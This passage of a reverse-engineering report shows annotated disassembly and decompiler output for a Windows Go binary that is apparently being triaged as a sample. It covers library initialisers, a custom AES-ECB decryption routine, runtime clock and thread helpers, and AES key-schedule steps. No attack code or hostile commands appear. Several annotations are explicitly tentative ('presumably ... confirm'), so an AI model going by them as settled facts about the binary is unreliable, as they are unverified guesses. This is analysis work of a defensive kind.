return SUB168(auVar1 * auVar2, 0) ^ SUB168(auVar1 * auVar2, 8);
}
0x476C00 init str 0 api 0 imm 6 Unknown
; golang.org.x.sys.windows.init: package initialiser of a third-party library
; package. The visible part is one pattern repeated: load a pointer from
; 0x53D708 (first four stores) or 0x53D710 (the rest) and store it into a
; global, with the destinations spaced 0x40 bytes apart starting at 0x53E958.
; When the dword at 0x5A2550 is non-zero the store goes through
; runtime.gcWriteBarrierCX (rdi = destination, rcx = value) instead of a plain
; mov. Presumably this wires per-API descriptors to two shared parent objects
; -- confirm against the package source. The listing is truncated by the
; report, so the end of the function and label .931 are not shown.
golang.org.x.sys.windows.init() {
cmp rsp, [r14+0x10] ; stack-limit check; .931 is outside the truncated listing
jbe .931
sub rsp, 0x10
mov [rsp+0x08], rbp
lea rbp, [rsp+0x08]
mov rcx, [0x53D708] ; first shared pointer
cmp dword ptr [0x5A2550], 0x00 ; write-barrier flag
jnz .1
mov [0x53E958], rcx ; plain store when the flag is clear
jmp .2
.1:
lea rdi, [0x53E958] ; barrier path: rdi = destination address
call runtime.gcWriteBarrierCX()
.2:
mov rcx, [0x53D708]
cmp dword ptr [0x5A2550], 0x00
jnz .3
mov [0x53E998], rcx
jmp .4
.3:
lea rdi, [0x53E998]
nop [rax], eax
call runtime.gcWriteBarrierCX()
.4:
mov rcx, [0x53D708]
cmp dword ptr [0x5A2550], 0x00
jnz .5
mov [0x53E9D8], rcx
jmp .6
.5:
lea rdi, [0x53E9D8]
call runtime.gcWriteBarrierCX()
.6:
mov rcx, [0x53D708]
cmp dword ptr [0x5A2550], 0x00
jnz .7
mov [0x53EA18], rcx
jmp .8
.7:
lea rdi, [0x53EA18]
call runtime.gcWriteBarrierCX()
.8:
mov rcx, [0x53D710] ; second shared pointer, used for all remaining visible stores
cmp dword ptr [0x5A2550], 0x00
jnz .9
mov [0x53EA58], rcx
jmp .10
.9:
lea rdi, [0x53EA58]
call runtime.gcWriteBarrierCX()
.10:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .11
mov [0x53EA98], rcx
jmp .12
.11:
lea rdi, [0x53EA98]
call runtime.gcWriteBarrierCX()
.12:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .13
mov [0x53EAD8], rcx
jmp .14
.13:
lea rdi, [0x53EAD8]
call runtime.gcWriteBarrierCX()
.14:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .15
mov [0x53EB18], rcx
jmp .16
.15:
lea rdi, [0x53EB18]
nop
call runtime.gcWriteBarrierCX()
.16:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .17
mov [0x53EB58], rcx
jmp .18
.17:
lea rdi, [0x53EB58]
call runtime.gcWriteBarrierCX()
.18:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .19
mov [0x53EB98], rcx
jmp .20
.19:
lea rdi, [0x53EB98]
call runtime.gcWriteBarrierCX()
.20:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .21
mov [0x53EBD8], rcx
jmp .22
.21:
lea rdi, [0x53EBD8]
call runtime.gcWriteBarrierCX()
.22:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .23
mov [0x53EC18], rcx
jmp .24
.23:
lea rdi, [0x53EC18]
call runtime.gcWriteBarrierCX()
.24:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .25
mov [0x53EC58], rcx
jmp .26
.25:
lea rdi, [0x53EC58]
call runtime.gcWriteBarrierCX()
.26:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .27
mov [0x53EC98], rcx
jmp .28
.27:
lea rdi, [0x53EC98]
nop
call runtime.gcWriteBarrierCX()
.28:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .29
mov [0x53ECD8], rcx
jmp .30
.29:
lea rdi, [0x53ECD8]
call runtime.gcWriteBarrierCX()
.30:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .31
mov [0x53ED18], rcx
jmp .32
.31:
lea rdi, [0x53ED18]
call runtime.gcWriteBarrierCX()
.32:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .33
mov [0x53ED58], rcx
jmp .34
.33:
lea rdi, [0x53ED58]
call runtime.gcWriteBarrierCX()
.34:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .35
mov [0x53ED98], rcx
jmp .36
.35:
lea rdi, [0x53ED98]
call runtime.gcWriteBarrierCX()
.36:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .37
mov [0x53EDD8], rcx
jmp .38
.37:
lea rdi, [0x53EDD8]
call runtime.gcWriteBarrierCX()
.38:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .39
mov [0x53EE18], rcx
jmp .40
.39:
lea rdi, [0x53EE18]
nop
call runtime.gcWriteBarrierCX()
.40:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .41
mov [0x53EE58], rcx
jmp .42
.41:
lea rdi, [0x53EE58]
call runtime.gcWriteBarrierCX()
.42:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .43
mov [0x53EE98], rcx
jmp .44
.43:
lea rdi, [0x53EE98]
call runtime.gcWriteBarrierCX()
.44:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .45
mov [0x53EED8], rcx
jmp .46
.45:
lea rdi, [0x53EED8]
call runtime.gcWriteBarrierCX()
.46:
mov rcx, [0x53D710]
cmp dword ptr [0x5A2550], 0x00
jnz .47
; listing truncated
/* DISPLAY WARNING: Type casts are NOT being printed */
/*
 * Decompiler view of golang.org.x.sys.windows.init (third-party library
 * package initialiser). Every if/else below is the same store: copy the
 * pointer at 0x53d708 (first four) or 0x53d710 (the rest) into a global, the
 * destinations being 0x40 bytes apart from 0x53e958 upward. The else branch
 * performs the same store through runtime.gcWriteBarrierCX when the flag at
 * 0x5a2550 is set; its destination and value travel in registers and are not
 * shown as arguments here. The listing is truncated by the report.
 */
void golang.org.x.sys.windows.init(void)
{
int64_t unaff_R14;
/* Stack-growth prologue: call morestack until the stack pointer clears the limit at *(R14 + 0x10). */
while (&stack0x00000000 <= *(unaff_R14 + 0x10)) {
runtime.morestack_noctxt();
}
if ([0x0x5a2550] == 0) {
[0x0x53e958] = [0x0x53d708];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53e998] = [0x0x53d708];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53e9d8] = [0x0x53d708];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ea18] = [0x0x53d708];
}
else {
runtime.gcWriteBarrierCX();
}
/* From here on the source pointer is the one at 0x53d710. */
if ([0x0x5a2550] == 0) {
[0x0x53ea58] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ea98] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ead8] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53eb18] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53eb58] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53eb98] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ebd8] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ec18] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ec58] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ec98] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ecd8] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ed18] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ed58] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ed98] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53edd8] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ee18] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ee58] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ee98] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53eed8] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ef18] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ef58] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53ef98] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53efd8] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53f018] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53f058] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53f098] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53f0d8] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53f118] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53f158] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53f198] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
}
if ([0x0x5a2550] == 0) {
[0x0x53f1d8] = [0x0x53d710];
}
else {
runtime.gcWriteBarrierCX();
/* listing truncated */
0x47BAC0 AesDecryptByECB str 0 api 0 imm 6 Unknown
; main.AesDecryptByECB: AES decryption routine from package main, i.e. code
; written for this sample rather than runtime or library code.
; Flow as visible below:
;   1. Build a small map holding the keys 0x10, 0x18 and 0x20 and look the key
;      length up in it; any other key length returns an empty result.
;   2. Convert the key string to bytes and call crypto.aes.NewCipher.
;   3. Allocate an output buffer of the input's length and decrypt it one
;      block at a time. Each block is processed independently, with no IV and
;      no chaining between blocks, which is ECB mode as the name says.
;   4. Read the last output byte as a padding length and return the output
;      truncated by that many bytes. The padding bytes are not validated.
; In (as spilled in the prologue):
;   rax/rbx/rcx = input slice pointer / length / capacity
;   rdi/rsi     = key string pointer / length
; Out (as set on the three exit paths):
;   rax/rbx/rcx = result slice pointer / length / capacity, rdi/rsi = error pair
; An empty input, or a length that is not a whole number of blocks, ends in a
; runtime panic (labels .6-.9) rather than an error return.
; For triage: the callers of this function are where the key string and the
; ciphertext buffer are prepared.
main.AesDecryptByECB() {
lea r12, [rsp-0x98]
cmp r12, [r14+0x10] ; stack-limit check for the 0x118-byte frame
jbe .10
sub rsp, 0x118
mov [rsp+0x110], rbp
lea rbp, [rsp+0x110]
mov [rsp+0x130], rcx ; input capacity
mov [rsp+0x120], rax ; input pointer
mov [rsp+0x140], rsi ; key length
mov [rsp+0x128], rbx ; input length
mov [rsp+0x138], rdi ; key pointer
movups [rsp+0xE0], xmm15 ; clear the 0x30-byte map header at rsp+0xE0 (xmm15 is used as a zero source here)
movups [rsp+0xF0], xmm15
movups [rsp+0x100], xmm15
lea rdi, [rsp+0x80]
lea rdi, [rdi-0x30]
nop [rax+rax*1], eax
mov [rsp-0x10], rbp
lea rbp, [rsp-0x10]
call loc_45d5f0 ; presumably the runtime's block-zeroing helper clearing the storage at rsp+0x80 -- confirm
mov rbp, [rbp]
lea r8, [rsp+0x80]
mov [rsp+0xF0], r8 ; map header field at +0x10 points at that storage
call runtime.fastrand()
mov [rsp+0xEC], eax ; map header field at +0x0C = random seed
lea rax, [0x486740] ; map type descriptor
lea rbx, [rsp+0xE0]
mov ecx, 0x10 ; insert key 16
call runtime.mapassign_fast64()
test [rax], al ; nil check on the returned slot; nothing is stored through it
lea rax, [0x486740]
lea rbx, [rsp+0xE0]
mov ecx, 0x18 ; insert key 24
nop
call runtime.mapassign_fast64()
test [rax], al
lea rax, [0x486740]
lea rbx, [rsp+0xE0]
mov ecx, 0x20 ; insert key 32
nop [rax+rax*1], eax
call runtime.mapassign_fast64()
test [rax], al
lea rax, [0x486740]
lea rbx, [rsp+0xE0]
mov rcx, [rsp+0x140] ; lookup key = key length
nop
call runtime.mapaccess2_fast64()
test bl, bl ; bl = "found" flag
jz .2 ; key length is not 16, 24 or 32
lea rax, [rsp+0x60]
mov rbx, [rsp+0x138]
mov rcx, [rsp+0x140]
call runtime.stringtoslicebyte() ; key string -> byte slice
call crypto.aes.NewCipher()
test rcx, rcx ; rcx != 0 means NewCipher returned an error
jnz .1
mov [rsp+0xD0], rbx ; cipher object (data word of the returned interface)
mov [rsp+0x48], rax ; method table of the returned interface
mov rcx, [rax+0x18] ; method slot at +0x18; presumably BlockSize -- confirm
mov rax, rbx
call rcx
mov [rsp+0x40], rax ; block size
mov rbx, [rsp+0x128]
mov rcx, rbx
lea rax, [0x484180]
nop
call runtime.makeslice() ; output buffer: length = capacity = input length
mov [rsp+0xD8], rax
mov rcx, [rsp+0x40] ; rcx = end offset of the first block (= block size)
mov rdx, [rsp+0x120]
mov rbx, [rsp+0xD0]
mov rsi, [rsp+0x130]
mov rdi, [rsp+0x128]
mov r8, [rsp+0x48]
mov r9, rcx
xor r10d, r10d ; r10 = start offset of the current block = 0
nop [rax], eax
jmp .4
.1:
; NewCipher failed: return an empty slice and pass the error pair through.
xor eax, eax
xor ebx, ebx
mov rsi, rdi
mov rdi, rcx
mov rcx, rbx
mov rbp, [rsp+0x110]
add rsp, 0x118
ret
.2:
; Unsupported key length: every return register is zero, so the caller gets
; an empty slice and no error value.
xor eax, eax
xor ebx, ebx
mov rcx, rbx
xor edi, edi
mov rsi, rax
mov rbp, [rsp+0x110]
add rsp, 0x118
ret
.3:
; Loop body: decrypt one block, output[start:end] from input[start:end].
mov [rsp+0x38], r10
mov [rsp+0x50], rcx
mov r11, [r8+0x20] ; method slot at +0x20; presumably Decrypt -- confirm
sub rcx, r10 ; block length = end - start
sub rdi, r10
mov r15, rdi ; remaining output capacity
neg rdi
sar rdi, 0x3F ; all-ones mask when capacity remains, zero otherwise
and rdi, r10 ; masked start offset (avoids forming a past-the-end pointer)
lea r13, [rdi+rax*1] ; destination pointer
sub rsi, r10
mov [rsp+0x58], rsi ; remaining input capacity
neg rsi
sar rsi, 0x3F
and rsi, r10
add rsi, rdx ; source pointer
mov rax, rbx ; receiver = cipher object
mov rbx, r13
mov rdi, r15
mov r8, rcx
mov r9, [rsp+0x58]
call r11
mov r9, [rsp+0x40]
mov rdx, [rsp+0x38]
lea r10, [rdx+r9*1] ; start += block size
mov rdx, [rsp+0x50]
lea rcx, [rdx+r9*1] ; end += block size
mov rdx, [rsp+0x120]
mov rax, [rsp+0xD0]
mov r11, [rsp+0x130]
mov rdi, [rsp+0x128]
mov r12, [rsp+0xD8]
mov r13, [rsp+0x48]
mov rax, r12
mov rbx, [rsp+0xD0]
mov rsi, r11
mov r8, r13
.4:
; Loop head: rdi = input length, r10 = start, rcx = end.
cmp rdi, r10
jle .5 ; start has reached the length: all blocks done
cmp rdi, rcx
jb .9 ; end is past the buffer (length not a multiple of the block size): panic
cmp rcx, r10
jnb .3
jmp .8
.5:
; Unpadding: the last output byte is taken as the number of bytes to drop.
lea r8, [rdi-0x01]
cmp rdi, r8
jbe .7 ; length 0: index -1 is out of range, panic
movzx r8d, byte ptr [rdi+rax*1-0x01] ; r8 = last byte of the output
mov rcx, rdi
sub rcx, r8 ; new length = length - padding byte
cmp rdi, rcx
jb .6 ; padding byte larger than the length: panic
mov rbx, rcx ; result length
mov rcx, rdi ; result capacity
xor edi, edi ; error pair = zero
xor esi, esi
mov rbp, [rsp+0x110]
add rsp, 0x118
ret
.6:
mov rdx, rdi
call runtime.panicSliceAcap()
.7:
mov rax, r8
mov rcx, rdi
call runtime.panicIndex()
.8:
mov rax, r10
call runtime.panicSliceB()
.9:
mov rdx, rdi
call runtime.panicSliceAcap()
nop
.10:
; Stack-growth path: spill the five argument registers, grow, reload, restart.
mov [rsp+0x08], rax
mov [rsp+0x10], rbx
mov [rsp+0x18], rcx
mov [rsp+0x20], rdi
mov [rsp+0x28], rsi
call runtime.morestack_noctxt()
mov rax, [rsp+0x08]
mov rbx, [rsp+0x10]
mov rcx, [rsp+0x18]
mov rdi, [rsp+0x20]
mov rsi, [rsp+0x28]
jmp main.AesDecryptByECB()
}
/* DISPLAY WARNING: Type casts are NOT being printed */
/*
 * Decompiler view of main.AesDecryptByECB (package main: code written for
 * this sample). Going by the spills at the top and the matching disassembly,
 * param_1/param_2/param_3 are the input slice pointer/length/capacity and
 * param_4/param_5 the key string pointer/length. The routine accepts only key
 * lengths 0x10, 0x18 or 0x20, builds an AES cipher from the key, decrypts the
 * input block by block with no IV or chaining (ECB), and strips a trailing
 * padding whose length is the last output byte. Only the result pointer is
 * shown as the return value; the result length and the error pair travel in
 * other registers (see the disassembly). The do/while wrapper is the stack
 * growth retry loop, not part of the algorithm.
 */
int64_t main.AesDecryptByECB
(undefined8 param_1,undefined8 param_2,undefined8 param_3,undefined8 param_4,undefined8 param_5)
{
code *pcVar1;
undefined4 uVar2;
int64_t extraout_RAX;
undefined8 uVar3;
int64_t iVar4;
undefined8 extraout_RAX_00;
int64_t extraout_RCX;
uint64_t uVar5;
undefined8 extraout_RCX_00;
int64_t iVar6;
char extraout_BL;
undefined8 extraout_RBX;
undefined8 extraout_RBX_00;
undefined8 extraout_RBX_01;
undefined *puVar7;
undefined8 unaff_RBP;
int64_t iVar8;
undefined8 extraout_RSI;
uint64_t extraout_RDI;
uint64_t uVar9;
undefined8 extraout_RDI_00;
int64_t iVar10;
uint64_t extraout_R8;
uint64_t uVar11;
uint64_t extraout_R10;
int64_t unaff_R14;
undefined in_XMM15 [16];
do {
puVar7 = register0x00000020;
if (*(unaff_R14 + 0x10) < register0x00000020 + -0x98) {
puVar7 = register0x00000020 + -0x118;
*(register0x00000020 + -8) = unaff_RBP;
*(register0x00000020 + 0x18) = param_3;
*(register0x00000020 + 8) = param_1;
*(register0x00000020 + 0x28) = param_5;
*(register0x00000020 + 0x10) = param_2;
*(register0x00000020 + 0x20) = param_4;
/* Zero the on-stack map header. */
*(register0x00000020 + -0x38) = in_XMM15;
*(register0x00000020 + -0x28) = in_XMM15;
*(register0x00000020 + -0x18) = in_XMM15;
*(register0x00000020 + -0x128) = register0x00000020 + -8;
*(register0x00000020 + -0x120) = 0x47bb4f;
func_0x0045d5f0();
unaff_RBP = *(register0x00000020 + -0x128);
*(register0x00000020 + -0x28) = register0x00000020 + -0x98;
*(register0x00000020 + -0x120) = 0x47bb68;
uVar2 = runtime.fastrand();
*(register0x00000020 + -0x2c) = uVar2;
/* Allowed key lengths: 0x10, 0x18, 0x20 inserted as map keys. */
*(register0x00000020 + -0x120) = 0x47bb88;
runtime.mapassign_fast64(0x486740, register0x00000020 + -0x38, 0x10);
*(register0x00000020 + -0x120) = 0x47bba5;
runtime.mapassign_fast64(0x486740, register0x00000020 + -0x38, 0x18);
*(register0x00000020 + -0x120) = 0x47bbc5;
runtime.mapassign_fast64(0x486740, register0x00000020 + -0x38, 0x20);
*(register0x00000020 + -0x120) = 0x47bbe5;
/* Look the key length (param_5) up in that map. */
runtime.mapaccess2_fast64(0x486740, register0x00000020 + -0x38, *(register0x00000020 + 0x28));
if (extraout_BL == '\0') {
/* Unsupported key length. */
return 0;
}
*(register0x00000020 + -0x120) = 0x47bc07;
runtime.stringtoslicebyte
(register0x00000020 + -0xb8, *(register0x00000020 + 0x20), *(register0x00000020 + 0x28));
*(register0x00000020 + -0x120) = 0x47bc0c;
crypto.aes.NewCipher();
if (extraout_RCX != 0) {
/* NewCipher reported an error. */
return 0;
}
*(register0x00000020 + -0x48) = extraout_RBX;
*(register0x00000020 + -0xd0) = extraout_RAX;
/* Interface method at table offset 0x18; its result is used as the block size below. */
pcVar1 = *(extraout_RAX + 0x18);
*(register0x00000020 + -0x120) = 0x47bc27;
uVar3 = (*pcVar1)(extraout_RBX);
*(register0x00000020 + -0xd8) = uVar3;
*(register0x00000020 + -0x120) = 0x47bc45;
/* Output buffer with length and capacity equal to the input length. */
iVar4 = runtime.makeslice(0x484180, *(register0x00000020 + 0x10), *(register0x00000020 + 0x10));
*(register0x00000020 + -0x40) = iVar4;
uVar5 = *(register0x00000020 + -0xd8);
iVar6 = *(register0x00000020 + 8);
uVar3 = *(register0x00000020 + -0x48);
iVar8 = *(register0x00000020 + 0x18);
uVar9 = *(register0x00000020 + 0x10);
iVar10 = *(register0x00000020 + -0xd0);
uVar11 = 0;
/* uVar11 = block start, uVar5 = block end, uVar9 = input length. */
while (uVar11 < uVar9) {
if (uVar9 < uVar5) goto code_r0x0047bdc5;
if (uVar5 < uVar11) goto code_r0x0047bdbd;
*(register0x00000020 + -0xe0) = uVar11;
*(register0x00000020 + -200) = uVar5;
/* Interface method at table offset 0x20: one call per block, output[start:end] from input[start:end]. */
pcVar1 = *(iVar10 + 0x20);
*(register0x00000020 + -0xc0) = iVar8 - uVar11;
*(register0x00000020 + -0x120) = 0x47bd0c;
(*pcVar1)(uVar3, (-(uVar9 - uVar11) >> 0x3f & uVar11) + iVar4, uVar5 - uVar11, uVar9 - uVar11,
(-(iVar8 - uVar11) >> 0x3f & uVar11) + iVar6, uVar5 - uVar11, *(register0x00000020 + -0xc0));
uVar5 = *(register0x00000020 + -200) + *(register0x00000020 + -0xd8);
iVar6 = *(register0x00000020 + 8);
iVar8 = *(register0x00000020 + 0x18);
uVar9 = *(register0x00000020 + 0x10);
iVar4 = *(register0x00000020 + -0x40);
iVar10 = *(register0x00000020 + -0xd0);
uVar3 = *(register0x00000020 + -0x48);
uVar11 = *(register0x00000020 + -0xe0) + *(register0x00000020 + -0xd8);
}
uVar11 = uVar9 - 1;
if (uVar11 < uVar9) {
/* The last output byte is the number of trailing bytes to drop; only its size against the length is checked. */
if (uVar9 - *((uVar9 - 1) + iVar4) <= uVar9) {
return iVar4;
}
*(register0x00000020 + -0x120) = 0x47bdb2;
runtime.panicSliceAcap();
uVar3 = extraout_RBX_00;
uVar9 = extraout_RDI;
uVar11 = extraout_R8;
}
/* Reached with an empty input: index -1 is out of range. */
*(register0x00000020 + -0x120) = 0x47bdbd;
runtime.panicIndex(uVar11, uVar3, uVar9);
uVar11 = extraout_R10;
code_r0x0047bdbd:
*(register0x00000020 + -0x120) = 0x47bdc5;
runtime.panicSliceB(uVar11);
code_r0x0047bdc5:
/* Reached when the input length is not a whole number of blocks. */
*(register0x00000020 + -0x120) = 0x47bdcd;
runtime.panicSliceAcap();
param_1 = extraout_RAX_00;
param_3 = extraout_RCX_00;
param_2 = extraout_RBX_01;
param_5 = extraout_RSI;
param_4 = extraout_RDI_00;
}
/* Stack-growth path: spill the arguments, grow the stack, reload and retry. */
*(puVar7 + 8) = param_1;
*(puVar7 + 0x10) = param_2;
*(puVar7 + 0x18) = param_3;
*(puVar7 + 0x20) = param_4;
*(puVar7 + 0x28) = param_5;
*(puVar7 + -8) = 0x47bdec;
runtime.morestack_noctxt();
param_1 = *(puVar7 + 8);
param_2 = *(puVar7 + 0x10);
param_3 = *(puVar7 + 0x18);
param_4 = *(puVar7 + 0x20);
param_5 = *(puVar7 + 0x28);
register0x00000020 = puVar7;
} while( true );
}
0x45ECE0 nanotime1 str 0 api 0 imm 5 Unknown
; runtime.nanotime1: Go runtime monotonic clock read on Windows.
; Fast path reads the 64-bit value at 0x7FFE0008 (the interrupt-time field of
; the fixed user-mode shared data page) and multiplies it by 100 to convert
; 100 ns units to nanoseconds. The result is returned in the caller's stack
; slot at [rsp+0x08], not in a register. Stock runtime code; the read of the
; shared page by itself is not a timing-based analysis check.
runtime.nanotime1() {
cmp byte ptr [0x5A22D4], 0x00 ; non-zero selects the QPC-based clock instead
jnz .1
mov rdi, 0x7FFE0008
mov rax, [rdi]
imul rax, rax, 0x64 ; x100: 100 ns ticks -> ns
mov [rsp+0x08], rax ; result slot on the caller's stack
ret
.1:
jmp runtime.nanotimeQPC() ; tail jump; the ret below is not reached on this path
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
/*
 * Decompiler view of runtime.nanotime1. The fast path looks empty because the
 * decompiler dropped the load from 0x7FFE0008, the multiply by 0x64 and the
 * store of the result to the caller's stack slot; use the disassembly for the
 * actual behaviour.
 */
void runtime.nanotime1(void)
{
if ([0x0x5a22d4] == '\0') {
return;
}
runtime.nanotimeQPC();
return;
}
0x45ECC0 switchtothread str 0 api 0 imm 4 Unknown
; runtime.switchtothread: Go runtime wrapper that calls kernel32.SwitchToThread
; through the import pointer. The stack is aligned to 16 bytes and 0x30 bytes
; are reserved (the callee's 32-byte home area plus the slot at +0x20 that
; keeps the original rsp) before the call. Stock runtime code.
runtime.switchtothread() {
mov rax, rsp ; remember the incoming stack pointer
and rsp, 0xFFFFFFFFFFFFFFF0 ; 16-byte alignment for the Windows call
sub rsp, 0x30
mov [rsp+0x20], rax
mov rax, [kernel32.SwitchToThread]
call rax
mov rsp, [rsp+0x20] ; restore the original stack pointer
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
/*
 * Decompiler view of runtime.switchtothread: a bare call to the imported
 * kernel32.SwitchToThread. The stack realignment seen in the disassembly is
 * not represented here.
 */
void runtime.switchtothread(void)
{
(*kernel32.SwitchToThread)();
return;
}
0x469AC0 _expand_key_128 str 0 api 0 imm 4 Unknown
; _expand_key_128: one step of an AES key schedule built on SSE registers.
; Register contract as used below (internal helper, not a standard ABI):
;   xmm0 = previous round key (updated in place to the next round key)
;   xmm1 = value whose top dword is broadcast and XORed in; presumably the
;          output of a key-generation-assist instruction in the caller -- confirm
;   xmm4 = scratch for the shifted copies
;   rbx  = output pointer, advanced by 16 bytes
; Library-style cipher code; it contains no key material.
_expand_key_128() {
pshufd xmm1, xmm1, 0xFF ; broadcast dword 3 of xmm1 to all four lanes
shufps xmm4, xmm0, 0x10
pxor xmm0, xmm4
shufps xmm4, xmm0, 0x8C
pxor xmm0, xmm4 ; fold shifted copies of the previous key into xmm0
pxor xmm0, xmm1 ; mix in the broadcast word
movups [rbx], xmm0 ; store the new round key
add rbx, 0x10
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
/*
 * Decompiler view of _expand_key_128. The helper takes its inputs in xmm0,
 * xmm1, xmm4 and rbx (see the disassembly), so the parameter list is a
 * decompiler artefact: param_1 stands for the low 64 bits of xmm0 and param_3
 * for the output pointer in rbx. Each of the four output words is an XOR of
 * words of the previous round key, the scratch register and the broadcast
 * word of xmm1.
 */
void _expand_key_128(undefined8 param_1,undefined8 param_2,uint32_t *param_3)
{
uint32_t uVar1;
uint32_t uVar2;
uint32_t in_XMM0_Dc;
uint32_t uVar3;
uint32_t in_XMM0_Dd;
uint32_t in_XMM1_Dd;
uint32_t in_XMM4_Da;
uVar2 = param_1 >> 0x20;
uVar1 = param_1;
uVar3 = in_XMM0_Dc ^ uVar2;
*param_3 = uVar1 ^ in_XMM1_Dd;
param_3[1] = uVar2 ^ in_XMM4_Da ^ uVar1 ^ in_XMM1_Dd;
param_3[2] = uVar3 ^ uVar1 ^ in_XMM4_Da ^ in_XMM1_Dd;
param_3[3] = in_XMM0_Dd ^ uVar1 ^ uVar3 ^ in_XMM1_Dd;
return;
}
0x469BC0 _expand_key_256b str 0 api 0 imm 4 Unknown
; _expand_key_256b: AES key-schedule step with the same shape as
; _expand_key_128, but working on xmm2 and broadcasting dword 2 of xmm1
; (0xAA) instead of dword 3. Presumably the second half-step of the 256-bit
; key schedule -- confirm against the caller.
;   xmm2 = previous key half (updated in place), xmm1 = assist value,
;   xmm4 = scratch, rbx = output pointer advanced by 16 bytes
_expand_key_256b() {
pshufd xmm1, xmm1, 0xAA ; broadcast dword 2 of xmm1 to all four lanes
shufps xmm4, xmm2, 0x10
pxor xmm2, xmm4
shufps xmm4, xmm2, 0x8C
pxor xmm2, xmm4 ; fold shifted copies of the previous key half into xmm2
pxor xmm2, xmm1 ; mix in the broadcast word
movups [rbx], xmm2 ; store the new round key
add rbx, 0x10
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
/*
 * Decompiler view of _expand_key_256b. As with _expand_key_128 the inputs
 * live in SSE registers and rbx, so the seven-parameter signature is a
 * decompiler artefact: param_3 stands for the low 64 bits of xmm2, param_5
 * for the low word of the scratch register and param_7 for the output
 * pointer. Read it together with the disassembly.
 */
